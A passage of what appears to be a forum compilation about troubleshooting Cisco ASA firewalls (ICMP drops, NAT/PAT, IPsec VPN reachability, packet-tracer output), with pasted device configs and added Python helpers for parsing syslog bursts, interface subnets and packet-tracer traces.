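2024-05-01T11:00:22 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
2024-05-01T11:00:25 %ASA-7-710006: ESP request discarded from 203.0.113.77 to outside:198.51.100.1
2024-05-01T11:00:40 %ASA-3-106014: Deny inbound icmp src outside:203.0.113.9 dst outside:198.51.100.2 (type 8, code 0)
"""

if __name__ == "__main__":
    for burst in find_bursts(parse_syslog(SAMPLE_LOG), threshold=5):
        print(describe(burst))
```

With threshold 5 only the unknown source is reported; the lone message from the real peer stays below it, which is the signal-versus-noise split a syslog rule for this message should make before anyone reaches for shun or an ACL.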
Windows Firewall inbound ICMP packets drop
Hi, we have enabled ICMPv4 traffic with a local firewall inbound rule in a GPO and we are still having ping drops. Is there another value somewhere that we could disable in our setup? It seems like a protection coming from the Windows Server 2008, and for no specific reason it blocks the traffic.
The ping comes from a Linux-based load balancer machine. We have created another test rule that opens all ports and all protocols coming from that IP address, and we get the same behaviour.
We know that if we restart the server it will let the ping go through again with no problem, but only for a relatively short period of time.
Carl R.
Thanks
Hi Carl,
>>we have enabled ICMPv4 traffic with a local firewall inbound rule in a GPO and we are still having ping drops.
Before going further, we can run the command gpresult /h gpreport.html with admin privileges to collect the Group Policy result and check whether the policy setting was applied successfully.
Regarding how to allow inbound Internet Control Message Protocol (ICMP) network traffic, the following article can be referred to for more information.
Create an Inbound ICMP Rule on Windows 7, Windows Vista, Windows Server 2008, or Windows Server 2008 R2
http://technet.microsoft.com/en-us/library/cc972926(v=ws.10).aspx
Besides, since this is related to networking, in order to get more and better help, we can also ask for suggestions in the following network forum.
Network Access Protection
https://social.technet.microsoft.com/Forums/windowsserver/en-US/home?forum=winserverNAP
Best regards,
Frank Shen -
ASA 5520 packets Flood TCP/ASA
I'm being flooded from random IP addresses on TCP/61137.
What can I do with my ASA 5520 security appliance?
You must use the shun command.
-
ASA 8.4(2) doesn't respond to ICMP echo on ip address with port forwarding only
Hello,
In order to meet our requirements we had to configure PAT for TCP 80 on 2 external IP addresses to one internal IP in the DMZ. TCP port 80 is being translated for both external IP addresses and it works as expected. However, since we have migrated to the ASA, both external IP addresses don't respond to ICMP echo requests, generating the following error:
%ASA-3-106014: Deny inbound icmp src outside:<Source IP> dst outside:<Destination IP> (type 8, code 0)
Previously we had been using a Cisco router to achieve the same objective, and it worked well.
I have noticed that when I add "same-security-traffic permit intra-interface" to the configuration, the message mentioned above stops appearing in the logs.
As far as I can tell, the ASA sends the packet back through the outside interface, despite the fact that the appliance advertises its MAC address in response to ARP requests for the same external IP address.
Is there any way to make the ASA realise that it should respond to ICMP echo requests on external IP addresses that have forwarding set up?
I do realise that ICMP would work in a 1-to-1 NAT scenario, but we can't apply 1-to-1 NAT for 2 external IP addresses pointing to one internal IP address.
Kind Regards,
Paul Preston
Hi Julio,
Interesting. I have tried to map two external IP addresses using 1-to-1 NAT to a single internal IP, but when I tried to configure the second one I remember a message "mapping exists"...
I think that it might be easier if I paste the relevant config:
access-list From_Internet extended permit icmp any any
access-list From_Internet extended permit tcp any gt 1023 host 172.17.0.103 eq www
access-list From_Internet extended deny ip any any log warnings
object network www-91-17.103
host 172.17.0.103
object network www-92-17.103
host 172.17.0.103
icmp permit any outside
object network www-91-17.103
nat (DMZ,outside) static x.x.x.91 service tcp www www
object network www-92-17.103
nat (DMZ,outside) static x.x.x.92 service tcp www www
With the config above, NAT works for both IP addresses, but unfortunately neither IP address responds to ICMP echo requests.
Kind Regards,
Paul Preston -
Cisco ASA 5505 IPsec client VPN - Cannot connect to local hosts
I have created a Cisco IPsec VPN on my ASA using the VPN creation wizard. I am able to successfully connect to the VPN and seemingly join the network, but after I connect I am unable to connect to or ping any of the hosts on the network.
Checking the ASA I can see that a VPN session is open and my client reports that it is connected. If I attempt to ping the client from the ASA all packets are dropped.
I suspect it may be an issue with my firewall, but I am not really sure where to begin.
Here is a copy of my config; any pointers or tips are appreciated:
hostname mcfw
enable password Pt8fQ27yMZplioYq encrypted
passwd 2qaO2Gd6IBRkrRFm encrypted
names
interface Ethernet0/0
switchport access vlan 400
interface Ethernet0/1
switchport access vlan 400
interface Ethernet0/2
switchport access vlan 420
interface Ethernet0/3
switchport access vlan 420
interface Ethernet0/4
switchport access vlan 450
interface Ethernet0/5
switchport access vlan 450
interface Ethernet0/6
switchport access vlan 500
interface Ethernet0/7
switchport access vlan 500
interface Vlan400
nameif outside
security-level 0
ip address 58.13.254.10 255.255.255.248
interface Vlan420
nameif public
security-level 20
ip address 192.168.20.1 255.255.255.0
interface Vlan450
nameif dmz
security-level 50
ip address 192.168.10.1 255.255.255.0
interface Vlan500
nameif inside
security-level 100
ip address 192.168.0.1 255.255.255.0
ftp mode passive
clock timezone JST 9
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
object-group network DM_INLINE_NETWORK_1
network-object host 58.13.254.11
network-object host 58.13.254.13
object-group service ssh_2220 tcp
port-object eq 2220
object-group service ssh_2251 tcp
port-object eq 2251
object-group service ssh_2229 tcp
port-object eq 2229
object-group service ssh_2210 tcp
port-object eq 2210
object-group service DM_INLINE_TCP_1 tcp
group-object ssh_2210
group-object ssh_2220
object-group service zabbix tcp
port-object range 10050 10051
object-group service DM_INLINE_TCP_2 tcp
port-object eq www
group-object zabbix
port-object eq 9000
object-group protocol TCPUDP
protocol-object udp
protocol-object tcp
object-group service http_8029 tcp
port-object eq 8029
object-group network DM_INLINE_NETWORK_2
network-object host 192.168.20.10
network-object host 192.168.20.30
network-object host 192.168.20.60
object-group service imaps_993 tcp
description Secure IMAP
port-object eq 993
object-group service public_wifi_group
description Service allowed on the Public Wifi Group. Allows Web and Email.
service-object tcp-udp eq domain
service-object tcp-udp eq www
service-object tcp eq https
service-object tcp-udp eq 993
service-object tcp eq imap4
service-object tcp eq 587
service-object tcp eq pop3
service-object tcp eq smtp
access-list outside_access_in remark http traffic from outside
access-list outside_access_in extended permit tcp any object-group DM_INLINE_NETWORK_1 eq www
access-list outside_access_in remark ssh from outside to web1
access-list outside_access_in extended permit tcp any host 58.13.254.11 object-group ssh_2251
access-list outside_access_in remark ssh from outside to penguin
access-list outside_access_in extended permit tcp any host 58.13.254.10 object-group ssh_2229
access-list outside_access_in remark http from outside to penguin
access-list outside_access_in extended permit tcp any host 58.13.254.10 object-group http_8029
access-list outside_access_in remark ssh from outside to hub & studio
access-list outside_access_in extended permit tcp any host 58.13.254.13 object-group DM_INLINE_TCP_1
access-list outside_access_in remark dns service to hub
access-list outside_access_in extended permit object-group TCPUDP any host 58.13.254.13 eq domain
access-list dmz_access_in extended permit ip 192.168.10.0 255.255.255.0 any
access-list dmz_access_in extended permit tcp any host 192.168.10.251 object-group DM_INLINE_TCP_2
access-list public_access_in remark Web access to DMZ websites (mediastudio/civicrm)
access-list public_access_in extended permit object-group TCPUDP any object-group DM_INLINE_NETWORK_2 eq www
access-list public_access_in remark General web access. (HTTP, DNS & ICMP and Email)
access-list public_access_in extended permit object-group public_wifi_group any any
access-list inside_nat0_outbound extended permit ip 192.168.0.0 255.255.255.0 192.168.10.0 255.255.255.0
access-list inside_nat0_outbound extended permit ip 192.168.0.0 255.255.255.0 192.168.20.0 255.255.255.0
access-list inside_nat0_outbound extended permit ip any 192.168.0.80 255.255.255.240
access-list inside_nat0_outbound extended permit ip any 192.168.0.64 255.255.255.192
pager lines 24
logging enable
logging timestamp
logging buffered notifications
logging trap notifications
logging asdm debugging
logging from-address [email protected]
logging recipient-address [email protected] level warnings
logging host dmz 192.168.10.90 format emblem
logging permit-hostdown
mtu outside 1500
mtu public 1500
mtu dmz 1500
mtu inside 1500
ip local pool OfficePool 192.168.0.80-192.168.0.90 mask 255.255.255.0
ip local pool VPN_Pool 192.168.0.91-192.168.0.99 mask 255.255.255.0
no failover
icmp unreachable rate-limit 1 burst-size 1
no asdm history enable
arp timeout 60
global (outside) 1 interface
global (dmz) 2 interface
nat (public) 1 0.0.0.0 0.0.0.0
nat (dmz) 1 0.0.0.0 0.0.0.0
nat (inside) 0 access-list inside_nat0_outbound
nat (inside) 1 0.0.0.0 0.0.0.0
static (inside,outside) tcp interface 2229 192.168.0.29 2229 netmask 255.255.255.255
static (inside,outside) tcp interface 8029 192.168.0.29 www netmask 255.255.255.255
static (dmz,outside) 58.13.254.13 192.168.10.10 netmask 255.255.255.255 dns
static (dmz,outside) 58.13.254.11 192.168.10.30 netmask 255.255.255.255 dns
static (inside,dmz) 192.168.10.0 192.168.0.0 netmask 255.255.255.0 dns
static (dmz,inside) 192.168.0.251 192.168.10.251 netmask 255.255.255.255
static (dmz,public) 192.168.20.30 192.168.10.30 netmask 255.255.255.255 dns
static (dmz,public) 192.168.20.10 192.168.10.10 netmask 255.255.255.255 dns
access-group outside_access_in in interface outside
access-group public_access_in in interface public
access-group dmz_access_in in interface dmz
route outside 0.0.0.0 0.0.0.0 58.13.254.9 1
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
dynamic-access-policy-record DfltAccessPolicy
http server enable
http 192.168.0.0 255.255.255.0 inside
http 59.159.40.188 255.255.255.255 outside
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart
sysopt noproxyarp dmz
sysopt noproxyarp inside
crypto ipsec transform-set ESP-AES-256-MD5 esp-aes-256 esp-md5-hmac
crypto ipsec transform-set ESP-DES-SHA esp-des esp-sha-hmac
crypto ipsec transform-set ESP-DES-MD5 esp-des esp-md5-hmac
crypto ipsec transform-set ESP-AES-192-MD5 esp-aes-192 esp-md5-hmac
crypto ipsec transform-set ESP-3DES-MD5 esp-3des esp-md5-hmac
crypto ipsec transform-set ESP-AES-256-SHA esp-aes-256 esp-sha-hmac
crypto ipsec transform-set ESP-AES-128-SHA esp-aes esp-sha-hmac
crypto ipsec transform-set ESP-AES-192-SHA esp-aes-192 esp-sha-hmac
crypto ipsec transform-set ESP-AES-128-MD5 esp-aes esp-md5-hmac
crypto ipsec transform-set TRANS_ESP_3DES_SHA esp-3des esp-sha-hmac
crypto ipsec transform-set TRANS_ESP_3DES_SHA mode transport
crypto ipsec transform-set ESP-3DES-SHA esp-3des esp-sha-hmac
crypto ipsec security-association lifetime seconds 28800
crypto ipsec security-association lifetime kilobytes 4608000
crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 set pfs group1
crypto dynamic-map SYSTEM_DEFAULT_CRYPTO_MAP 65535 set transform-set ESP-AES-128-SHA ESP-AES-128-MD5 ESP-AES-192-SHA ESP-AES-192-MD5 ESP-AES-256-SHA ESP-AES-256-MD5 ESP-3DES-SHA ESP-3DES-MD5 ESP-DES-SHA ESP-DES-MD5
crypto map inside_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map inside_map interface inside
crypto map outside_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map outside_map interface outside
crypto map public_map 65535 ipsec-isakmp dynamic SYSTEM_DEFAULT_CRYPTO_MAP
crypto map public_map interface public
crypto isakmp enable outside
crypto isakmp enable public
crypto isakmp enable inside
crypto isakmp policy 5
authentication pre-share
encryption 3des
hash sha
group 2
lifetime 86400
crypto isakmp policy 10
authentication pre-share
encryption des
hash sha
group 2
lifetime 86400
telnet timeout 5
ssh 59.159.40.188 255.255.255.255 outside
ssh 192.168.0.0 255.255.255.0 inside
ssh timeout 20
console timeout 0
dhcpd dns 61.122.112.97 61.122.112.1
dhcpd auto_config outside
dhcpd address 192.168.20.200-192.168.20.254 public
dhcpd enable public
dhcpd address 192.168.10.190-192.168.10.195 dmz
dhcpd enable dmz
dhcpd address 192.168.0.200-192.168.0.254 inside
dhcpd enable inside
threat-detection basic-threat
threat-detection statistics access-list
threat-detection statistics host number-of-rate 2
no threat-detection statistics tcp-intercept
ntp server 130.54.208.201 source public
webvpn
group-policy DefaultRAGroup internal
group-policy DefaultRAGroup attributes
dns-server value 61.122.112.97 61.122.112.1
vpn-tunnel-protocol l2tp-ipsec
group-policy CiscoASA internal
group-policy CiscoASA attributes
dns-server value 61.122.112.97 61.122.112.1
vpn-tunnel-protocol IPSec
username mcit password 4alT9CZ8ayD8O8Xg encrypted privilege 15
tunnel-group DefaultRAGroup general-attributes
address-pool VPN_Pool
default-group-policy DefaultRAGroup
tunnel-group DefaultRAGroup ipsec-attributes
pre-shared-key *****
tunnel-group ocmc type remote-access
tunnel-group ocmc general-attributes
address-pool OfficePool
tunnel-group ocmc ipsec-attributes
pre-shared-key *****
tunnel-group CiscoASA type remote-access
tunnel-group CiscoASA general-attributes
address-pool VPN_Pool
default-group-policy CiscoASA
tunnel-group CiscoASA ipsec-attributes
pre-shared-key *****
class-map inspection_default
match default-inspection-traffic
policy-map type inspect dns preset_dns_map
parameters
message-length maximum client auto
message-length maximum 512
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
inspect ftp
inspect h323 h225
inspect h323 ras
inspect ip-options
inspect netbios
inspect rsh
inspect rtsp
inspect skinny
inspect esmtp
inspect sqlnet
inspect sunrpc
inspect tftp
inspect sip
inspect xdmcp
service-policy global_policy global
smtp-server 192.168.10.10
prompt hostname context
call-home
profile CiscoTAC-1
no active
destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService
destination address email [email protected]
destination transport-method http
subscribe-to-alert-group diagnostic
subscribe-to-alert-group environment
subscribe-to-alert-group inventory periodic monthly
subscribe-to-alert-group configuration periodic monthly
subscribe-to-alert-group telemetry periodic daily
Cryptochecksum:222d6dcb583b5f5abc51a2251026f7f2
: end
asdm location 192.168.10.10 255.255.255.255 inside
asdm location 192.168.0.29 255.255.255.255 inside
asdm location 58.13.254.10 255.255.255.255 inside
no asdm history enable
Hi Conor,
What is your local net? I see only one default route for the outside network. Don't you need a route inside for your local network?
Regards,
Umair -
After trying to set up the access list, it returns drop in packet tracer and cannot ping the outside router either.
Is there a configuration example showing how to allow a class C subnet to surf the internet through a Cisco ASA?
assume all works in GNS3, expect initial network setup too
inside outside
router A 192.168.1.2 <--->switch <---> 192.168.1.1 ASA 192.168.1.4 <---> switch <---> router B 192.168.1.3
ASA version: 8.42
When I try the following commands:
ASA
conf t
interface GigabitEthernet 0
description INSIDE
nameif inside
security-level 0
ip address 192.168.1.1 255.255.255.0
no shut
end
conf t
interface GigabitEthernet 1
description OUTSIDE
no shutdown
nameif outside
security-level 100
ip address 192.168.1.4 255.255.255.0
no shut
end
conf t
object network obj_any
subnet 0.0.0.0 0.0.0.0
nat (inside,outside) dynamic interface
end
conf t
access-list USERSLIST permit ip 192.168.1.0 255.255.255.0 any
access-group USERSLIST in interface inside
end
Router A
conf t
int fastEthernet 0/0
ip address 192.168.1.2 255.255.255.0
no shut
end
Router B
conf t
int fastEthernet 0/0
ip address 192.168.1.3 255.255.255.0
no shut
end
ASA-1# packet-tracer input inside tcp 192.168.1.1 1 192.168.1.4 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.1.0 255.255.255.0 inside
Phase: 2
Type: ACCESS-LIST
Subtype:
Result: DROP
Config:
Implicit Rule
Additional Information:
Result:
input-interface: inside
input-status: up
input-line-status: up
output-interface: inside
output-status: up
output-line-status: up
Action: drop
Current config cannot ping: one packet tracer allows all, another packet tracer drops.
can not ping between Router A and Router B
ASA-1# packet-tracer input inside tcp 192.168.1.2 1 192.168.3.3 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.3.0 255.255.255.0 outside
Phase: 2
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 3
Type: NAT
Subtype:
Result: ALLOW
Config:
object network DYNAMIC-PAT
nat (inside,outside) dynamic interface
Additional Information:
Dynamic translate 192.168.1.2/1 to 192.168.3.4/311
Phase: 4
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 5
Type: FLOW-CREATION
Subtype:
Result: ALLOW
Config:
Additional Information:
New flow created with id 14, packet dispatched to next module
Result:
input-interface: inside
input-status: up
input-line-status: up
output-interface: outside
output-status: up
output-line-status: up
Action: allow
ASA-1# packet-tracer input outside tcp 192.168.3.3 1 192.168.1.2 1
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.1.0 255.255.255.0 inside
Phase: 2
Type: ACCESS-LIST
Subtype:
Result: DROP
Config:
Implicit Rule
Additional Information:
Result:
input-interface: outside
input-status: up
input-line-status: up
output-interface: inside
output-status: up
output-line-status: up
Action: drop
Drop-reason: (acl-drop) Flow is denied by configured rule
ASA-1#
ASA-1# sh run |
: Saved
ASA Version 8.4(2)
hostname ASA-1
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
names
interface GigabitEthernet0
description INSIDE
nameif inside
security-level 100
ip address 192.168.1.1 255.255.255.0
interface GigabitEthernet1
description OUTSIDE
nameif outside
security-level 0
ip address 192.168.3.4 255.255.255.0
interface GigabitEthernet2
shutdown
no nameif
no security-level
no ip address
ftp mode passive
object network DYNAMIC-PAT
subnet 192.168.1.0 255.255.255.0
access-list 101 extended permit icmp any any echo-reply
access-list 101 extended permit icmp any any source-quench
access-list 101 extended permit icmp any any unreachable
access-list 101 extended permit icmp any any time-exceeded
access-list ACL-OUTSIDE extended permit icmp any any
pager lines 24
mtu inside 1500
mtu outside 1500
icmp unreachable rate-limit 1 burst-size 1
no asdm history enable
arp timeout 14400
object network DYNAMIC-PAT
nat (inside,outside) dynamic interface
access-group ACL-OUTSIDE in interface outside
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00 mgcp-pat 0:05:00
timeout sip 0:30:00 sip_media 0:02:00 sip-invite 0:03:00 sip-disconnect 0:02:00
timeout sip-provisional-media 0:02:00 uauth 0:05:00 absolute
timeout tcp-proxy-reassembly 0:01:00
timeout floating-conn 0:00:00
dynamic-access-policy-record DfltAccessPolicy
user-identity default-domain LOCAL
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp authentication linkup linkdown coldstart warmstart
telnet timeout 5
ssh timeout 5
console timeout 0
threat-detection basic-threat
threat-detection statistics access-list
no threat-detection statistics tcp-intercept
prompt hostname context
no call-home reporting anonymous
call-home
profile CiscoTAC-1
no active
destination address http https://tools.cisco.com/its/service/oddce/services/DDCEService
destination address email [email protected]
destination transport-method http
subscribe-to-alert-group diagnostic
subscribe-to-alert-group environment
subscribe-to-alert-group inventory periodic monthly
subscribe-to-alert-group configuration periodic monthly
subscribe-to-alert-group telemetry periodic daily
crashinfo save disable
Cryptochecksum:8ee9b8e8ccf0bf1873cd5aa1efea2b64
: end
ASA-1# -
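The interface commands posted in the GNS3 thread above put both interfaces in 192.168.1.0/24 and give the interface named inside security-level 0 and the one named outside security-level 100. An ASA in routed mode refuses an ip address that overlaps another interface's subnet, and by default it only forwards traffic from a higher security-level interface to a lower one, so both details are worth checking before reaching for packet-tracer. The following is an added helper, not ASA code and not from any poster: it parses flattened interface blocks as pasted on this page, reports overlapping subnets, and lists interfaces from most to least trusted. The OVERLAPPING and SEPARATED strings are constructed excerpts modelled on the commands in the thread, not device captures.

```python
"""Check ASA interface blocks for overlapping subnets and show the trust order (added helper)."""
import ipaddress
from typing import Dict, List, Tuple

# Constructed excerpts modelled on the interface commands posted above, not live captures.
# OVERLAPPING: both named interfaces sit in 192.168.1.0/24, which routed-mode ASA rejects.
OVERLAPPING = """\
interface GigabitEthernet0
description INSIDE
nameif inside
security-level 0
ip address 192.168.1.1 255.255.255.0
interface GigabitEthernet1
description OUTSIDE
nameif outside
security-level 100
ip address 192.168.1.4 255.255.255.0
interface GigabitEthernet2
shutdown
no nameif
no security-level
no ip address
ftp mode passive
"""
# SEPARATED: outside moved to 192.168.3.0/24, as in the sh run posted later in the thread.
SEPARATED = OVERLAPPING.replace("ip address 192.168.1.4", "ip address 192.168.3.4")

# Interface sub-commands that do not end a block when the indentation has been lost.
SUBCOMMANDS = ("description ", "shutdown", "no nameif", "no security-level",
               "no ip address", "switchport ", "vlan ", "speed ", "duplex ")


def parse_interfaces(config: str) -> Dict[str, dict]:
    """Map nameif -> {"port", "nameif", "level", "network"} for every named interface.

    Works on flattened dumps (as pasted in this thread): an interface block ends at
    the first line that is not a recognised interface sub-command.
    """
    blocks, cur = [], None
    for raw in config.splitlines():
        line = raw.strip()
        if line.startswith("interface "):
            cur = {"port": line.split(None, 1)[1], "nameif": None, "level": None, "network": None}
            blocks.append(cur)
        elif cur is None:
            continue
        elif line.startswith("nameif "):
            cur["nameif"] = line.split()[1]
        elif line.startswith("security-level "):
            cur["level"] = int(line.split()[1])
        elif line.startswith("ip address "):
            parts = line.split()
            if len(parts) >= 4:  # "ip address dhcp" carries no static subnet
                cur["network"] = ipaddress.ip_interface(f"{parts[2]}/{parts[3]}").network
        elif not line.startswith(SUBCOMMANDS):
            cur = None  # a top-level command: the interface block is over
    return {b["nameif"]: b for b in blocks if b["nameif"]}


def find_overlaps(ifaces: Dict[str, dict]) -> List[Tuple[str, str]]:
    """Pairs of named interfaces whose subnets overlap (the ASA would reject the second)."""
    named = [(n, i["network"]) for n, i in ifaces.items() if i["network"] is not None]
    return [(a, b) for x, (a, na) in enumerate(named) for b, nb in named[x + 1:] if na.overlaps(nb)]


def trust_order(ifaces: Dict[str, dict]) -> List[str]:
    """Interface names from most to least trusted; traffic flows freely only downwards."""
    levelled = [n for n, i in ifaces.items() if i["level"] is not None]
    return sorted(levelled, key=lambda n: -ifaces[n]["level"])


if __name__ == "__main__":
    for name, cfg in (("OVERLAPPING", OVERLAPPING), ("SEPARATED", SEPARATED)):
        ifs = parse_interfaces(cfg)
        print(name, "overlaps:", find_overlaps(ifs), "trust order:", trust_order(ifs))
```

With the constructed OVERLAPPING excerpt the helper reports the inside/outside pair as overlapping and lists outside before inside in the trust order, which is the reverse of what the interface names suggest; with SEPARATED only the trust-order finding remains.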
ASA 5510 traffic from inside to outside
Hello,
I'm working on a basic configuration of a 5510 ASA.
inside network of 192.168.23.0 /24
outside network 141.0.x.0 /24
config is as follows:
interface Ethernet0/0
nameif OUTSIDE
security-level 0
ip address 141.0.x.0 255.255.255.0
interface Ethernet0/1
nameif INSIDE
security-level 50
ip address 192.168.23.1 255.255.255.0
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
access-list OUTSIDE_access_in extended permit icmp any any
access-list OUTSIDE_access_in extended permit tcp any interface OUTSIDE eq https
access-list INSIDE_access_in extended permit icmp any any
global (OUTSIDE) 1 interface
nat (INSIDE) 1 192.168.23.0 255.255.255.0
access-group OUTSIDE_access_in in interface OUTSIDE
access-group INSIDE_access_in in interface INSIDE
route OUTSIDE 0.0.0.0 0.0.0.0 141.0.x.57 1
In the lab, when I plug a laptop into the outside interface with address 141.0.x.57, I can ping it from a laptop on the inside interface and I can even access the IIS page. However, when I connect the ISP's firewall to the outside interface with the same address I used for the testing laptop, I cannot seem to access the outside world.
I can ping from the ASA's outside interface (x.58) to the ISP's x.57, but I cannot ping it from the inside 192.168.23.x or access anything.
So traffic between the inside and outside interfaces is not going through in the live setup; in the lab it works fine.
Any ideas please?
Version of FW:
Cisco Adaptive Security Appliance Software Version 8.2(1)
Device Manager Version 6.3(1)
Output of Packet-Trace Command is:
SDH-PUBLIC-ASA(config)# packet-tracer input INSIDE icmp 192.168.23.10 8 0 141.$
Phase: 1
Type: ACCESS-LIST
Subtype:
Result: ALLOW
Config:
Implicit Rule
Additional Information:
MAC Access list
Phase: 2
Type: FLOW-LOOKUP
Subtype:
Result: ALLOW
Config:
Additional Information:
Found no matching flow, creating a new flow
Phase: 3
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 141.0.x.0 255.255.255.0 OUTSIDE
Phase: 4
Type: ACCESS-LIST
Subtype: log
Result: ALLOW
Config:
access-group INSIDE_access_in in interface INSIDE
access-list INSIDE_access_in extended permit icmp any any
Additional Information:
Phase: 5
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 6
Type: INSPECT
Subtype: np-inspect
Result: ALLOW
Config:
class-map inspection_default
match default-inspection-traffic
policy-map global_policy
class inspection_default
inspect icmp
service-policy global_policy global
Additional Information:
Phase: 7
Type: INSPECT
Subtype: np-inspect
Result: ALLOW
Config:
Additional Information:
Phase: 8
Type: NAT
Subtype:
Result: ALLOW
Config:
nat (INSIDE) 0 192.168.23.0 255.255.255.0
match ip INSIDE 192.168.23.0 255.255.255.0 OUTSIDE any
identity NAT translation, pool 0
translate_hits = 104, untranslate_hits = 0
Additional Information:
Dynamic translate 192.168.23.10/0 to 192.168.23.10/0 using netmask 255.255.255.255
Phase: 9
Type: NAT
Subtype: host-limits
Result: ALLOW
Config:
nat (INSIDE) 0 192.168.23.0 255.255.255.0
match ip INSIDE 192.168.23.0 255.255.255.0 OUTSIDE any
identity NAT translation, pool 0
translate_hits = 107, untranslate_hits = 0
Additional Information:
Phase: 10
Type: IP-OPTIONS
Subtype:
Result: ALLOW
Config:
Additional Information:
Phase: 11
Type: FLOW-CREATION
Subtype:
Result: ALLOW
Config:
Additional Information:
New flow created with id 141, packet dispatched to next module
Result:
input-interface: INSIDE
input-status: up
input-line-status: up
output-interface: OUTSIDE
output-status: up
output-line-status: up
Action: allow -
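Both the GNS3 thread and the 5510 thread above paste raw packet-tracer output, and the question each time is the same: which phase dropped the packet, which rule matched, and what the Drop-reason was. The following is an added helper, not Cisco code and not from any poster: it parses the Phase/Type/Result blocks into records, skips the terminal pager prompts, and reduces a trace to a one-line verdict. SAMPLE_DROP is a constructed trace modelled on the outside-to-inside drop quoted in the GNS3 thread, not a live capture.

```python
"""Summarise Cisco ASA packet-tracer output: which phase dropped the packet and why (added helper)."""
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample modelled on the outside-to-inside trace in the GNS3 thread above,
# not a live capture; the terminal pager prompt is kept to show that it is skipped.
SAMPLE_DROP = """\
Phase: 1
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in 192.168.1.0 255.255.255.0 inside
Phase: 2
Type: ACCESS-LIST
Subtype:
Result: DROP
Config:
Implicit Rule
Additional Information:
Result:
input-interface: outside
output-interface: inside
Action: drop
<--- More --->
Drop-reason: (acl-drop) Flow is denied by configured rule
"""


@dataclass
class Phase:
    number: int
    type: str = ""
    result: str = ""
    config: List[str] = field(default_factory=list)  # lines under "Config:" (the rule that matched)
    info: List[str] = field(default_factory=list)    # lines under "Additional Information:"


@dataclass
class Trace:
    phases: List[Phase] = field(default_factory=list)
    action: str = ""
    input_interface: str = ""
    output_interface: str = ""
    drop_reason: Optional[str] = None

    def first_drop(self) -> Optional[Phase]:
        return next((p for p in self.phases if p.result == "DROP"), None)


def _value(line: str) -> str:
    return line.split(":", 1)[1].strip()


def parse_packet_tracer(text: str) -> Trace:
    trace, cur, section = Trace(), None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "<--- More --->" or "packet-tracer input" in line:
            continue  # blank line, pager prompt, or the echoed command itself
        if line.startswith("Phase:"):
            cur = Phase(int(_value(line)))
            trace.phases.append(cur)
            section = None
        elif line == "Result:":  # a bare "Result:" opens the final summary block
            cur = None
        elif cur is not None:  # still inside a phase block
            if line.startswith("Type:"):
                cur.type = _value(line)
            elif line.startswith("Result:"):
                cur.result = _value(line)
            elif line == "Config:":
                section = "config"
            elif line == "Additional Information:":
                section = "info"
            elif section == "config":
                cur.config.append(line)
            elif section == "info":
                cur.info.append(line)
        elif line.startswith("Action:"):
            trace.action = _value(line)
        elif line.startswith("input-interface:"):
            trace.input_interface = _value(line)
        elif line.startswith("output-interface:"):
            trace.output_interface = _value(line)
        elif line.startswith("Drop-reason:"):
            trace.drop_reason = _value(line)
    return trace


def summarize(trace: Trace) -> str:
    """One-line verdict naming the dropping phase, the matched rule and the Drop-reason."""
    if trace.action == "allow":
        return f"allow: {trace.input_interface} -> {trace.output_interface} through {len(trace.phases)} phase(s)"
    p = trace.first_drop()
    where = f"phase {p.number} ({p.type})" if p else "unknown phase"
    matched = "; ".join(p.config) if p and p.config else "no config shown"
    return f"drop at {where}: {matched}; {trace.drop_reason or 'no Drop-reason line'}"


if __name__ == "__main__":
    print(summarize(parse_packet_tracer(SAMPLE_DROP)))
```

Feeding it the pasted 5510 trace gives an allow verdict through eleven phases, while the constructed drop sample points at phase 2, ACCESS-LIST, Implicit Rule, with the acl-drop reason; that is the distinction the replies in these threads ask the posters to look for.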
ASA 5505 initial build - Failed to locate egress interface (Please help :-) )
Hi, I have just purchased an ASA 5505 and have completed the initial setup via the wizard. I am currently unable to access services on the outside of the ASA.
The error 'Failed to locate egress interface for UDP from inside' appears whenever my DNS server attempts a lookup.
I have configured this several times from scratch using the wizard and I am unable to figure out the issue with the NAT / routing config.
If I run the packet tracer I get the error "(no-route) no route to host"; however, I do have a default route configured, so I suspect it may be my NAT configuration.
Overview: 192.168.10.0/24 inside the ASA, 192.168.1.0/24 outside the ASA, 192.168.1.1 is the gateway to the internet. I ideally want the ASA to use PAT to mask the 192.168.10.0/24 network behind the ASA's 192.168.1.0/24 network address but still allow clients to gain internet access.
Full config follows, screenshots attached, any help would be very gratefully received.
Result of the command: "sh run"
: Saved
ASA Version 9.0(1)
